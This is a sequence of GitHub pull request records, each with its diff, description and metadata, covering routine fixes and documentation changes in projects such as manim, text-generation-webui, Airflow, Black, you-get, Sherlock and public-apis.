diff --git a/manimlib/mobject/svg/string_mobject.py b/manimlib/mobject/svg/string_mobject.py index 5004960e61..e4376a3360 100644 --- a/manimlib/mobject/svg/string_mobject.py +++ b/manimlib/mobject/svg/string_mobject.py @@ -174,8 +174,8 @@ def find_spans_by_single_selector(sel): ): l = self.full_span[1] span = tuple( + default_index if index is None else min(index, l) if index >= 0 else max(index + l, 0) - if index is not None else default_index for index, default_index in zip(sel, self.full_span) ) return [span]
## Motivation There's a logistic bug when handling `None` in spans. My apologies for that. ## Proposed changes - M `manimlib/mobject/svg/string_mobject.py`
https://api.github.com/repos/3b1b/manim/pulls/1815
2022-05-20T10:55:13Z
2022-05-20T10:56:40Z
2022-05-20T10:56:40Z
2022-05-20T10:56:41Z
168
3b1b/manim
18,321
Use separate llama-cpp-python packages for GGML support
diff --git a/download-model.py b/download-model.py index be8d59fe09..3bb4a39bc7 100644 --- a/download-model.py +++ b/download-model.py @@ -57,7 +57,8 @@ def get_download_links_from_huggingface(self, model, branch, text_only=False): classifications = [] has_pytorch = False has_pt = False - # has_gguf = False + has_gguf = False + has_ggml = False has_safetensors = False is_lora = False while True: @@ -79,6 +80,7 @@ def get_download_links_from_huggingface(self, model, branch, text_only=False): is_safetensors = re.match(r".*\.safetensors", fname) is_pt = re.match(r".*\.pt", fname) is_gguf = re.match(r'.*\.gguf', fname) + is_ggml = re.match(r".*ggml.*\.bin", fname) is_tokenizer = re.match(r"(tokenizer|ice|spiece).*\.model", fname) is_text = re.match(r".*\.(txt|json|py|md)", fname) or is_tokenizer if any((is_pytorch, is_safetensors, is_pt, is_gguf, is_tokenizer, is_text)): @@ -102,8 +104,11 @@ def get_download_links_from_huggingface(self, model, branch, text_only=False): has_pt = True classifications.append('pt') elif is_gguf: - # has_gguf = True + has_gguf = True classifications.append('gguf') + elif is_ggml: + has_ggml = True + classifications.append('ggml') cursor = base64.b64encode(f'{{"file_name":"{dict[-1]["path"]}"}}'.encode()) + b':50' cursor = base64.b64encode(cursor) @@ -115,6 +120,12 @@ def get_download_links_from_huggingface(self, model, branch, text_only=False): if classifications[i] in ['pytorch', 'pt']: links.pop(i) + # If both GGML and GGUF are available, download GGUF only + if has_ggml and has_gguf: + for i in range(len(classifications) - 1, -1, -1): + if classifications[i] == 'ggml': + links.pop(i) + return links, sha256, is_lora def get_output_folder(self, model, branch, is_lora, base_folder=None): diff --git a/modules/llamacpp_hf.py b/modules/llamacpp_hf.py index 0608cb016c..a2dcb34b99 100644 --- a/modules/llamacpp_hf.py +++ b/modules/llamacpp_hf.py @@ -9,23 +9,38 @@ from modules import RoPE, shared from modules.logging_colors import logger +from modules.utils import is_gguf import llama_cpp +try: + import llama_cpp_ggml +except: + llama_cpp_ggml = llama_cpp + if torch.cuda.is_available() and not torch.version.hip: try: import llama_cpp_cuda except: llama_cpp_cuda = None + try: + import llama_cpp_ggml_cuda + except: + llama_cpp_ggml_cuda = llama_cpp_cuda else: llama_cpp_cuda = None + llama_cpp_ggml_cuda = None -def llama_cpp_lib(): +def llama_cpp_lib(model_file: Union[str, Path] = None): + if model_file is not None: + gguf_model = is_gguf(model_file) + else: + gguf_model = True if shared.args.cpu or llama_cpp_cuda is None: - return llama_cpp + return llama_cpp if gguf_model else llama_cpp_ggml else: - return llama_cpp_cuda + return llama_cpp_cuda if gguf_model else llama_cpp_ggml_cuda class LlamacppHF(PreTrainedModel): @@ -165,7 +180,7 @@ def from_pretrained(cls, pretrained_model_name_or_path: Optional[Union[str, os.P if path.is_file(): model_file = path else: - model_file = list(path.glob('*.gguf*'))[0] + model_file = (list(path.glob('*.gguf*')) + list(path.glob('*ggml*.bin')))[0] logger.info(f"llama.cpp weights detected: {model_file}\n") @@ -188,12 +203,17 @@ def from_pretrained(cls, pretrained_model_name_or_path: Optional[Union[str, os.P 'rope_freq_base': RoPE.get_rope_freq_base(shared.args.alpha_value, shared.args.rope_freq_base), 'tensor_split': tensor_split_list, 'rope_freq_scale': 1.0 / shared.args.compress_pos_emb, - 'n_gqa': shared.args.n_gqa or None, - 'rms_norm_eps': shared.args.rms_norm_eps or None, 'logits_all': True, } + + if not is_gguf(model_file): + ggml_params = { + 'n_gqa': shared.args.n_gqa or None, + 'rms_norm_eps': shared.args.rms_norm_eps or None, + } + params = params | ggml_params - Llama = llama_cpp_lib().Llama + Llama = llama_cpp_lib(model_file).Llama model = Llama(**params) return LlamacppHF(model) diff --git a/modules/llamacpp_model.py b/modules/llamacpp_model.py index d2893b0dda..4908ecb72b 100644 --- a/modules/llamacpp_model.py +++ b/modules/llamacpp_model.py @@ -1,5 +1,7 @@ import re from functools import partial +from pathlib import Path +from typing import Union import torch @@ -7,23 +9,38 @@ from modules.callbacks import Iteratorize from modules.logging_colors import logger from modules.text_generation import get_max_prompt_length +from modules.utils import is_gguf import llama_cpp +try: + import llama_cpp_ggml +except: + llama_cpp_ggml = llama_cpp + if torch.cuda.is_available() and not torch.version.hip: try: import llama_cpp_cuda except: llama_cpp_cuda = None + try: + import llama_cpp_ggml_cuda + except: + llama_cpp_ggml_cuda = llama_cpp_cuda else: llama_cpp_cuda = None + llama_cpp_ggml_cuda = None -def llama_cpp_lib(): +def llama_cpp_lib(model_file: Union[str, Path] = None): + if model_file is not None: + gguf_model = is_gguf(model_file) + else: + gguf_model = True if shared.args.cpu or llama_cpp_cuda is None: - return llama_cpp + return llama_cpp if gguf_model else llama_cpp_ggml else: - return llama_cpp_cuda + return llama_cpp_cuda if gguf_model else llama_cpp_ggml_cuda def ban_eos_logits_processor(eos_token, input_ids, logits): @@ -41,8 +58,8 @@ def __del__(self): @classmethod def from_pretrained(self, path): - Llama = llama_cpp_lib().Llama - LlamaCache = llama_cpp_lib().LlamaCache + Llama = llama_cpp_lib(str(path)).Llama + LlamaCache = llama_cpp_lib(str(path)).LlamaCache result = self() cache_capacity = 0 @@ -75,9 +92,14 @@ def from_pretrained(self, path): 'rope_freq_base': RoPE.get_rope_freq_base(shared.args.alpha_value, shared.args.rope_freq_base), 'tensor_split': tensor_split_list, 'rope_freq_scale': 1.0 / shared.args.compress_pos_emb, - 'n_gqa': shared.args.n_gqa or None, - 'rms_norm_eps': shared.args.rms_norm_eps or None, } + + if not is_gguf(str(path)): + ggml_params = { + 'n_gqa': shared.args.n_gqa or None, + 'rms_norm_eps': shared.args.rms_norm_eps or None, + } + params = params | ggml_params result.model = Llama(**params) if cache_capacity > 0: diff --git a/modules/models.py b/modules/models.py index 5268a2fc76..3025fe3d8a 100644 --- a/modules/models.py +++ b/modules/models.py @@ -241,7 +241,7 @@ def llamacpp_loader(model_name): if path.is_file(): model_file = path else: - model_file = list(Path(f'{shared.args.model_dir}/{model_name}').glob('*.gguf*'))[0] + model_file = (list(Path(f'{shared.args.model_dir}/{model_name}').glob('*.gguf*')) + list(Path(f'{shared.args.model_dir}/{model_name}').glob('*ggml*.bin')))[0] logger.info(f"llama.cpp weights detected: {model_file}") model, tokenizer = LlamaCppModel.from_pretrained(model_file) diff --git a/modules/models_settings.py b/modules/models_settings.py index 2ed658b8c2..c55b1e884f 100644 --- a/modules/models_settings.py +++ b/modules/models_settings.py @@ -24,9 +24,9 @@ def infer_loader(model_name): loader = None elif Path(f'{shared.args.model_dir}/{model_name}/quantize_config.json').exists() or ('wbits' in model_settings and type(model_settings['wbits']) is int and model_settings['wbits'] > 0): loader = 'AutoGPTQ' - elif len(list(path_to_model.glob('*.gguf*'))) > 0: + elif len(list(path_to_model.glob('*.gguf*')) + list(path_to_model.glob('*ggml*.bin'))) > 0: loader = 'llama.cpp' - elif re.match(r'.*\.gguf', model_name.lower()): + elif re.match(r'.*\.gguf|.*ggml.*\.bin', model_name.lower()): loader = 'llama.cpp' elif re.match(r'.*rwkv.*\.pth', model_name.lower()): loader = 'RWKV' diff --git a/modules/utils.py b/modules/utils.py index 0a7edffaaa..3862817dad 100644 --- a/modules/utils.py +++ b/modules/utils.py @@ -2,6 +2,7 @@ import re from datetime import datetime from pathlib import Path +from typing import Union from modules import shared from modules.logging_colors import logger @@ -124,3 +125,11 @@ def get_datasets(path: str, ext: str): def get_available_chat_styles(): return sorted(set(('-'.join(k.stem.split('-')[1:]) for k in Path('css').glob('chat_style*.css'))), key=natural_keys) + +# Determines if a llama.cpp model is in GGUF format +# Copied from ctransformers utils.py +def is_gguf(path: Union[str, Path]) -> bool: + path = str(Path(path).resolve()) + with open(path, "rb") as f: + magic = f.read(4) + return magic == "GGUF".encode() diff --git a/requirements.txt b/requirements.txt index a28d87ee7a..0c6aeb1b89 100644 --- a/requirements.txt +++ b/requirements.txt @@ -35,6 +35,11 @@ https://github.com/abetlen/llama-cpp-python/releases/download/v0.1.79/llama_cpp_ # llama-cpp-python with CUDA support https://github.com/jllllll/llama-cpp-python-cuBLAS-wheels/releases/download/textgen-webui/llama_cpp_python_cuda-0.1.79+cu117-cp310-cp310-win_amd64.whl; platform_system == "Windows" https://github.com/jllllll/llama-cpp-python-cuBLAS-wheels/releases/download/textgen-webui/llama_cpp_python_cuda-0.1.79+cu117-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" +# llama-cpp-python with GGML support +https://github.com/jllllll/llama-cpp-python-cuBLAS-wheels/releases/download/cpu/llama_cpp_python_ggml-0.1.78+cpuavx2-cp310-cp310-win_amd64.whl; platform_system == "Windows" +https://github.com/jllllll/llama-cpp-python-cuBLAS-wheels/releases/download/cpu/llama_cpp_python_ggml-0.1.78+cpuavx2-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" +https://github.com/jllllll/llama-cpp-python-cuBLAS-wheels/releases/download/textgen-webui/llama_cpp_python_ggml_cuda-0.1.78+cu117-cp310-cp310-win_amd64.whl; platform_system == "Windows" +https://github.com/jllllll/llama-cpp-python-cuBLAS-wheels/releases/download/textgen-webui/llama_cpp_python_ggml_cuda-0.1.78+cu117-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" # GPTQ-for-LLaMa https://github.com/jllllll/GPTQ-for-LLaMa-CUDA/releases/download/0.1.0/gptq_for_llama-0.1.0+cu117-cp310-cp310-win_amd64.whl; platform_system == "Windows"
## Checklist: - [x] I have read the [Contributing guidelines](https://github.com/oobabooga/text-generation-webui/wiki/Contributing-guidelines). --- Based on: https://github.com/oobabooga/text-generation-webui/pull/3695 This will maintain full GGML support while allowing llama-cpp-python to be updated. Intended to be temporary until more models are converted to GGUF, but can be a long term solution if desired.
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/3697
2023-08-26T18:29:19Z
2023-08-27T04:51:00Z
2023-08-27T04:51:00Z
2023-09-25T01:22:21Z
3,188
oobabooga/text-generation-webui
26,530
Adds auto_ml and machineJS- automated machine learning
diff --git a/README.md b/README.md index 2e8fefcc..3588d80c 100644 --- a/README.md +++ b/README.md @@ -438,6 +438,7 @@ For a list of free-to-attend meetups and local events, go [here](https://github. * [LDA.js](https://github.com/primaryobjects/lda) - LDA topic modeling for node.js * [Learning.js](https://github.com/yandongliu/learningjs) - Javascript implementation of logistic regression/c4.5 decision tree * [Machine Learning](http://joonku.com/project/machine_learning) - Machine learning library for Node.js +* [machineJS](https://github.com/ClimbsRocks/machineJS) - Automated machine learning, data formatting, ensembling, and hyperparameter optimization for competitions and exploration- just give it a .csv file! * [mil-tokyo](https://github.com/mil-tokyo) - List of several machine learning libraries * [Node-SVM](https://github.com/nicolaspanel/node-svm) - Support Vector Machine for nodejs * [Brain](https://github.com/harthur/brain) - Neural networks in JavaScript **[Deprecated]** @@ -760,6 +761,7 @@ on MNIST digits[DEEP LEARNING] <a name="python-general-purpose" /> #### General-Purpose Machine Learning +* [auto_ml](https://github.com/ClimbsRocks/auto_ml) - Automated machine learning pipelines for analytics and production. Handles some standard feature engineering, feature selection, model selection, model tuning, ensembling, and advanced scoring, in addition to logging output for analysts trying to understand their datasets. * [machine learning](https://github.com/jeff1evesque/machine-learning) - automated build consisting of a [web-interface](https://github.com/jeff1evesque/machine-learning#web-interface), and set of [programmatic-interface](https://github.com/jeff1evesque/machine-learning#programmatic-interface) API, for support vector machines. Corresponding dataset(s) are stored into a SQL database, then generated model(s) used for prediction(s), are stored into a NoSQL datastore. * [XGBoost](https://github.com/dmlc/xgboost) - Python bindings for eXtreme Gradient Boosting (Tree) Library * [Bayesian Methods for Hackers](https://github.com/CamDavidsonPilon/Probabilistic-Programming-and-Bayesian-Methods-for-Hackers) - Book/iPython notebooks on Probabilistic Programming in Python
Thanks for maintaining this project! I already found a few new projects on here I want to add into auto_ml.
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/335
2016-12-06T19:51:52Z
2016-12-06T20:18:04Z
2016-12-06T20:18:04Z
2016-12-06T20:18:04Z
570
josephmisiti/awesome-machine-learning
51,842
Don't log CLI actions if db not initialized
diff --git a/airflow/utils/cli_action_loggers.py b/airflow/utils/cli_action_loggers.py index 17a4c4f890b22..0c93148308fbc 100644 --- a/airflow/utils/cli_action_loggers.py +++ b/airflow/utils/cli_action_loggers.py @@ -97,6 +97,8 @@ def default_action_log(sub_command, user, task_id, dag_id, execution_date, host_ :param **_: other keyword arguments that is not being used by this function :return: None """ + from sqlalchemy.exc import OperationalError, ProgrammingError + from airflow.models.log import Log from airflow.utils import timezone from airflow.utils.session import create_session @@ -121,8 +123,18 @@ def default_action_log(sub_command, user, task_id, dag_id, execution_date, host_ } ], ) - except Exception as error: - logging.warning("Failed to log action with %s", error) + except (OperationalError, ProgrammingError) as e: + expected = [ + '"log" does not exist', # postgres + "no such table", # sqlite + "log' doesn't exist", # mysql + "Invalid object name 'log'", # mssql + ] + error_is_ok = e.args and any(x in e.args[0] for x in expected) + if not error_is_ok: + logging.warning("Failed to log action %s", e) + except Exception as e: + logging.warning("Failed to log action %s", e) __pre_exec_callbacks: list[Callable] = []
This gets rid of a potentially confusing error message. Before: <img width="441" alt="image" src="https://user-images.githubusercontent.com/15932138/203466778-de475387-9caa-4ca9-a56e-a3809593fab6.png"> After: <img width="426" alt="image" src="https://user-images.githubusercontent.com/15932138/203466794-8450909a-9693-4caf-989b-6a54d1b024fb.png">
https://api.github.com/repos/apache/airflow/pulls/27851
2022-11-23T04:00:00Z
2022-12-03T06:32:28Z
2022-12-03T06:32:28Z
2023-01-09T23:14:04Z
372
apache/airflow
14,662
Add Windows installation documentation
diff --git a/docs/source/installation/windows.rst b/docs/source/installation/windows.rst index 7618c4a87c..bbea877c62 100644 --- a/docs/source/installation/windows.rst +++ b/docs/source/installation/windows.rst @@ -1,4 +1,60 @@ Windows ======= -A stub for windows installation +Install System Libraries +------------------------ + +Make sure you have *Python 3* for Windows installed first: + +https://www.python.org/downloads/windows/ + +Install ffmpeg: + +https://ffmpeg.org/download.html#build-windows + +Install sox: + +http://sox.sourceforge.net/Main/HomePage + +Install a latex distribution. On Windows MikTex is commonly used: + +https://miktex.org/howto/install-miktex + +Path configuration +------------------ + +To invoke commandline without supplying path to the binary +the PATH environment needs to be configured. Below are template examples, please change +the path according to your username and specific python version. Assuming all the +softwares are installed with no alteration to the installation paths:: + + C:\Users\$username\AppData\local\Programs\Python\Python$version\ + C:\Users\$username\AppData\local\Programs\Python\Python$version\Scripts\ + C:\MikTex\miktex\bin\x64\ + C:\ffmpeg\bin\ + +The path entries should be separated by semicolon. + +Installing python packages and manim +------------------------------------ + +Make sure you can start pip using ``pip`` in your commandline. Then do +``pip install pyreadline`` for the ``readline`` package. + +Grab the pycairo wheel binary ``pycairo‑1.18.0‑cp37‑cp37m‑win32.whl`` from https://www.lfd.uci.edu/~gohlke/pythonlibs/#pycairo +and install it via ``pip C:\absolute\path\to\the\whl\file`` + +clone the manim repository if you have git ``git clone https://github.com/3b1b/manim`` or download the zip file from +the repository page with ``Clone or download`` button and unzip it. + +Open the commandline within the manim directory with ``Shift + Right click`` on an empty space in the folder and select ``open command window here`` + +Install manim python dependencies with ``pip install -r requirement.txt`` + +Test the installation +--------------------- + +Type in ``python -m manim -h`` and if nothing went wrong during the installtion process you should see the help text. + +Use ``python -m manim example_scene.py SquareToCircle -pl`` to render the example scene and the file should play after rendering. The movie file should be +in ``media/videos/example_scenes/480p15``
The installation is done with a Windows8 machine, further testing are needed for windows10. for example ``python`` will launch just fine, while doing so would result in a command not found in cmd.exe Also I omitted the pypi installtion, for some reasons the pycairo whl install will be removed and force a recompile which #555 is supposed to fix? or just that pypi hasn't get updated yet ? Installing collected packages: pycairo, manimlib Found existing installation: pycairo 1.18.0 Uninstalling pycairo-1.18.0: Successfully uninstalled pycairo-1.18.0 Running setup.py install for pycairo ... error ERROR: Complete output from command 'c:\users\k\appdata\local\programs\python\python37-32\python.exe' -u -c 'import setuptools, tokenize;__file__='"'"'C:\\Users\\K\\AppData\\Local\\Temp\\pip-install-302sb5sa\\pycairo\\setup.py'"'"';f=ge tattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compi le(code, __file__, '"'"'exec'"'"'))' install --record 'C:\Users\K\AppData\Local\Temp\pip-record-6iskt02e\install-record. txt' --single-version-externally-managed --compile: ERROR: running install running build running build_py creating build creating build\lib.win32-3.7 creating build\lib.win32-3.7\cairo copying cairo\__init__.py -> build\lib.win32-3.7\cairo copying cairo\__init__.pyi -> build\lib.win32-3.7\cairo copying cairo\py.typed -> build\lib.win32-3.7\cairo running build_ext building 'cairo._cairo' extension error: Microsoft Visual C++ 14.0 is required. Get it with "Microsoft Visual C++ Build Tools": https://visualstudio.m icrosoft.com/downloads/ And the buildtool is quite large. manim runs fine using the repo though.
https://api.github.com/repos/3b1b/manim/pulls/561
2019-05-28T20:32:09Z
2019-05-29T02:08:36Z
2019-05-29T02:08:36Z
2019-05-30T01:50:33Z
631
3b1b/manim
18,074
[Ximalaya] fix #1955
diff --git a/src/you_get/extractors/ximalaya.py b/src/you_get/extractors/ximalaya.py index 58a158ba57..58e2945cb2 100644 --- a/src/you_get/extractors/ximalaya.py +++ b/src/you_get/extractors/ximalaya.py @@ -15,7 +15,8 @@ def ximalaya_download_by_id(id, title = None, output_dir = '.', info_only = False, stream_id = None): BASE_URL = 'http://www.ximalaya.com/tracks/' - json_data = json.loads(get_content(BASE_URL + id + '.json')) + json_url = BASE_URL + id + '.json' + json_data = json.loads(get_content(json_url, headers=fake_headers)) if 'res' in json_data: if json_data['res'] == False: raise ValueError('Server reported id %s is invalid' % id)
Now ximalaya api server checks UA. If there's 'python' (case insensitive) in UA it will return empty content instead of json string. ``` curl 'http://www.ximalaya.com/tracks/330957273.json' -H 'user-agent: python-urllib/3.5' ``` return nothing ``` curl 'http://www.ximalaya.com/tracks/3.json' -H 'user-agent: ython-urllib/3.5' {"res":false} ``` ``` ./you-get -d 'http://www.ximalaya.com/2982325/sound/30957273' [DEBUG] get_content: http://www.ximalaya.com/tracks/30957273.json [DEBUG] ximalaya_download_by_id: http://audio.xmcdn.com/group24/M04/9E/A9/wKgJMFiq4_iDnkMKAZ_V_DLoKG4117.m4a Site: ximalaya.com title: 01游玩天桥 Type: MPEG-4 audio m4a Size: N/A Downloading 01游玩天桥.m4a ... 100% ( 26.0/ 26.0MB) ├█████████████████████████████████████████┤[1/1] 2 MB/s ```
https://api.github.com/repos/soimort/you-get/pulls/1956
2017-05-09T02:30:02Z
2017-05-09T02:33:57Z
2017-05-09T02:33:57Z
2017-05-09T02:44:38Z
209
soimort/you-get
21,238
Fix incorrect space before colon in if/while stmts
diff --git a/CHANGES.md b/CHANGES.md index 1c53604d4d..7e356f1f29 100644 --- a/CHANGES.md +++ b/CHANGES.md @@ -7,6 +7,9 @@ - `Black` now respects `--skip-string-normalization` when normalizing multiline docstring quotes (#1637) +- `Black` no longer adds an incorrect space after a parenthesized assignment expression + in if/while statements (#1655) + - fixed a crash when PWD=/ on POSIX (#1631) ### 20.8b1 diff --git a/docs/change_log.md b/docs/change_log.md index b733716665..cc5015f873 100644 --- a/docs/change_log.md +++ b/docs/change_log.md @@ -9,6 +9,11 @@ - `Black` now respects `--skip-string-normalization` when normalizing multiline docstring quotes (#1637) +- `Black` no longer adds an incorrect space after a parenthesized assignment expression + in if/while statements (#1655) + +- fixed a crash when PWD=/ on POSIX (#1631) + ### 20.8b1 #### _Packaging_ diff --git a/src/black/__init__.py b/src/black/__init__.py index 048e771ce9..64a1865590 100644 --- a/src/black/__init__.py +++ b/src/black/__init__.py @@ -5190,9 +5190,9 @@ def normalize_invisible_parens(node: Node, parens_after: Set[str]) -> None: if check_lpar: if is_walrus_assignment(child): - continue + pass - if child.type == syms.atom: + elif child.type == syms.atom: if maybe_make_parens_invisible_in_atom(child, parent=node): wrap_in_parentheses(node, child, visible=False) elif is_one_tuple(child): diff --git a/tests/data/pep_572.py b/tests/data/pep_572.py index 9e429f913c..637b3bb38c 100644 --- a/tests/data/pep_572.py +++ b/tests/data/pep_572.py @@ -2,6 +2,8 @@ (a := a) if (match := pattern.search(data)) is None: pass +if (match := pattern.search(data)): + pass [y := f(x), y ** 2, y ** 3] filtered_data = [y for x in data if (y := f(x)) is None] (y := f(x)) @@ -41,3 +43,5 @@ def foo(answer: (p := 42) = 5): while x := f(x): pass +while (x := f(x)): + pass
Fixes #1174 Fixes #1588 Previously Black would format this code ``` if (foo := True): print(foo) ``` as ``` if (foo := True) : print(foo) ``` adding an incorrect space after the RPAR. Buggy code in the normalize_invisible_parens function caused the colon to be wrapped in invisible parentheses. The LPAR of that pair was then prefixed with a single space at the request of the whitespace function. This commit fixes the accidental skipping of a pre-condition check which must return True before parenthesis normalization of a specific child Leaf or Node can happen. The pre-condition check being skipped was why the colon was wrapped in invisible parentheses.
https://api.github.com/repos/psf/black/pulls/1655
2020-08-29T23:45:05Z
2020-08-31T21:20:07Z
2020-08-31T21:20:06Z
2020-09-02T22:29:17Z
634
psf/black
24,160
Fix http/https mixed content on index page
diff --git a/index.html b/index.html index df68e63e35..cc3bee36b8 100644 --- a/index.html +++ b/index.html @@ -102,7 +102,7 @@ <h1 id="you-get">You-Get</h1> <p>Interested? <a href="#installation">Install it</a> now and <a href="#getting-started">get started by examples</a>.</p> <p>Are you a Python programmer? Then check out <a href="https://github.com/soimort/you-get">the source</a> and fork it!</p> <div class="figure"> -<img src="http://i.imgur.com/GfthFAz.png" /> +<img src="https://i.imgur.com/GfthFAz.png" /> </div> <h2 id="installation">Installation</h2> diff --git a/index.md b/index.md index a51e35d759..1e6af9e51c 100644 --- a/index.md +++ b/index.md @@ -51,7 +51,7 @@ Interested? [Install it](#installation) now and [get started by examples](#getti Are you a Python programmer? Then check out [the source](https://github.com/soimort/you-get) and fork it! -![](http://i.imgur.com/GfthFAz.png) +![](https://i.imgur.com/GfthFAz.png) ## Installation
you-get.org is server over https so images should be secured to. <!-- Reviewable:start --> --- This change is [<img src="https://reviewable.io/review_button.svg" height="34" align="absmiddle" alt="Reviewable"/>](https://reviewable.io/reviews/soimort/you-get/1447) <!-- Reviewable:end -->
https://api.github.com/repos/soimort/you-get/pulls/1447
2016-10-09T20:35:10Z
2016-10-14T18:26:28Z
2016-10-14T18:26:28Z
2016-10-14T18:26:28Z
330
soimort/you-get
20,999
Clarify 2.3.0 kubernetes min version is about library not cluster
diff --git a/README.md b/README.md index 6f5830e68b211..01eab7b755979 100644 --- a/README.md +++ b/README.md @@ -85,15 +85,15 @@ Airflow is not a streaming solution, but it is often used to process real-time d Apache Airflow is tested with: -| | Main version (dev) | Stable version (2.3.0) | -|---------------------|-------------------------|--------------------------| -| Python | 3.7, 3.8, 3.9, 3.10 | 3.6, 3.7, 3.8, 3.9 | -| Platform | AMD64/ARM64(\*) | AMD64 | -| Kubernetes | 1.20, 1.21, 1.22, 1.23 | 1.18, 1.19, 1.20 | -| PostgreSQL | 10, 11, 12, 13 | 9.6, 10, 11, 12, 13 | -| MySQL | 5.7, 8 | 5.7, 8 | -| SQLite | 3.15.0+ | 3.15.0+ | -| MSSQL | 2017(\*), 2019 (\*) | | +| | Main version (dev) | Stable version (2.3.0) | +|---------------------|-------------------------|-------------------------| +| Python | 3.7, 3.8, 3.9, 3.10 | 3.6, 3.7, 3.8, 3.9 | +| Platform | AMD64/ARM64(\*) | AMD64 | +| Kubernetes | 1.20, 1.21, 1.22, 1.23 | 1.20, 1.21, 1.22, 1.23 | +| PostgreSQL | 10, 11, 12, 13 | 9.6, 10, 11, 12, 13 | +| MySQL | 5.7, 8 | 5.7, 8 | +| SQLite | 3.15.0+ | 3.15.0+ | +| MSSQL | 2017(\*), 2019 (\*) | | \* Experimental diff --git a/RELEASE_NOTES.rst b/RELEASE_NOTES.rst index a13e8e3ef0a7e..15ac6c1b0a389 100644 --- a/RELEASE_NOTES.rst +++ b/RELEASE_NOTES.rst @@ -41,8 +41,13 @@ Previously, a task’s log is dynamically rendered from the ``[core] log_filenam A new ``log_template`` table is introduced to solve this problem. This table is synchronized with the aforementioned config values every time Airflow starts, and a new field ``log_template_id`` is added to every DAG run to point to the format used by tasks (``NULL`` indicates the first ever entry for compatibility). -Minimum kubernetes version bumped from ``3.0.0`` to ``21.7.0`` (#20759) -""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +Minimum kubernetes library version bumped from ``3.0.0`` to ``21.7.0`` (#20759) +""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" + +.. note:: + + This is only about changing the ``kubernetes`` library, not the Kubernetes cluster. Airflow support for + Kubernetes version is described in `Installation prerequisites <https://airflow.apache.org/docs/apache-airflow/stable/installation/prerequisites.html>`_. No change in behavior is expected. This was necessary in order to take advantage of a `bugfix <https://github.com/kubernetes-client/python-base/commit/70b78cd8488068c014b6d762a0c8d358273865b4>`_ concerning refreshing of Kubernetes API tokens with EKS, which enabled the removal of some `workaround code <https://github.com/apache/airflow/pull/20759>`_.
It was not clear from the release notes that the minimum version of the kubernetes was about the library rather than cluster version. Also README was not updated with min versions of Kubernetes cluster for 2.3.0 version. <!-- Thank you for contributing! Please make sure that your code changes are covered with tests. And in case of new features or big changes remember to adjust the documentation. Feel free to ping committers for the review! In case of existing issue, reference it using one of the following: closes: #ISSUE related: #ISSUE How to write a good git commit message: http://chris.beams.io/posts/git-commit/ --> --- **^ Add meaningful description above** Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/main/CONTRIBUTING.rst#pull-request-guidelines)** for more information. In case of fundamental code change, Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)) is needed. In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x). In case of backwards incompatible changes please leave a note in a newsfragement file, named `{pr_number}.significant.rst`, in [newsfragments](https://github.com/apache/airflow/tree/main/newsfragments).
https://api.github.com/repos/apache/airflow/pulls/23398
2022-05-02T08:49:34Z
2022-05-02T09:01:51Z
2022-05-02T09:01:51Z
2022-05-08T08:17:55Z
1,016
apache/airflow
14,459
[docs]: add missing tiktoken dependency
diff --git a/docs/docs/expression_language/get_started.ipynb b/docs/docs/expression_language/get_started.ipynb index 39c04a9f61a291..2ca5072c911977 100644 --- a/docs/docs/expression_language/get_started.ipynb +++ b/docs/docs/expression_language/get_started.ipynb @@ -321,7 +321,7 @@ "outputs": [], "source": [ "# Requires:\n", - "# pip install langchain docarray\n", + "# pip install langchain docarray tiktoken\n", "\n", "from langchain.chat_models import ChatOpenAI\n", "from langchain.embeddings import OpenAIEmbeddings\n",
Description: I was following the docs and got an error about missing tiktoken dependency. Adding it to the comment where the langchain and docarray libs are.
https://api.github.com/repos/langchain-ai/langchain/pulls/14497
2023-12-10T00:04:07Z
2023-12-13T01:04:49Z
2023-12-13T01:04:49Z
2023-12-13T01:04:49Z
157
langchain-ai/langchain
43,654
Chore / Minor docker improvements
diff --git a/Dockerfile b/Dockerfile index 159246673..0393bc2ad 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,7 +1,6 @@ FROM python:3.7-alpine as build WORKDIR /wheels -RUN apk update --no-cache \ - && apk add --no-cache \ +RUN apk add --no-cache \ g++ \ gcc \ libxml2 \ diff --git a/docker-compose.yml b/docker-compose.yml index e7e97c421..c1d659e27 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -1,6 +1,8 @@ version: '2' + services: sherlock: build: . + image: theyahya/sherlock volumes: - "./results:/opt/sherlock/results"
- Remove unnecessary `apk update` - Set image name in `docker-compose.yml`
https://api.github.com/repos/sherlock-project/sherlock/pulls/402
2019-12-04T15:50:50Z
2019-12-04T16:41:31Z
2019-12-04T16:41:31Z
2019-12-04T18:09:43Z
197
sherlock-project/sherlock
36,385
Add Pinata
diff --git a/README.md b/README.md index d6e9216acb..898fe2ffb4 100644 --- a/README.md +++ b/README.md @@ -290,6 +290,7 @@ API | Description | Auth | HTTPS | CORS | | [OneDrive](https://dev.onedrive.com/) | File Sharing and Storage | `OAuth` | Yes | Unknown | | [Pantry](https://getpantry.cloud/) | Free JSON storage for small projects | No | Yes | Yes | | [Pastebin](https://pastebin.com/doc_api) | Plain Text Storage | `apiKey` | Yes | Unknown | +| [Pinata](https://docs.pinata.cloud/) | IPFS Pinning Services API | `apiKey` | Yes | Unknown | | [Quip](https://quip.com/dev/automation/documentation) | File Sharing and Storage for groups | `apiKey` | Yes | Yes | | [Web3 Storage](https://web3.storage/) | File Sharing and Storage for Free with 1TB Space | `apiKey` | Yes | Yes |
